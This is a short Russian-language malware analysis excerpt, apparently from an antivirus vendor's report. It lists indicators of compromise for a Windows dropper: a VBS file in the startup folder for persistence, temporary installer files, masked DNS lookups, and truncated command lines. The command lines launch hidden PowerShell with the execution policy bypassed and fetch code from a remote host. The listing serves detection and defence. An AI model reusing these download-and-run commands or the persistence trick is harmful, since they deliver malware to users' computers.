Техническая информация
- %APPDATA%\microsoft\windows\start menu\programs\startup\windows.vbs
- %TEMP%\install.exe
- <Полный путь к файлу>windows.vbs
- %TEMP%\is-28n87.tmp\install.tmp
- %TEMP%\is-emedb.tmp\_isetup\_setup64.tmp
- DNS ASK go#####analytics.com
- DNS ASK 5.###4top.net
- '%TEMP%\install.exe'
- '<SYSTEM32>\wscript.exe' "<Полный путь к файлу>windows.vbs"
- '%TEMP%\is-28n87.tmp\install.tmp' /SL5="$70248,30886599,121344,%TEMP%\install.exe"
- '<SYSTEM32>\cmd.exe' /c powershell -ExecutionPolicy Bypass -windowstyle hidden -noexit -command [System.Net.WebClient]$webClient = New-Object System.Net.WebClient;[System.IO.Stream]$stream = $webClient.OpenRead('ht...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c powershell -ExecutionPolicy Bypass -windowstyle hidden -noexit -command [System.Net.WebClient]$webClient = New-Object System.Net.WebClient;[System.IO.Stream]$stream = $webClient.OpenRead('ht...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -command [System.Net.WebClient]$webClient = New-Object System.Net.WebClient;[System.IO.Stream]$stream = $webClient.OpenRead('https://5.top4to...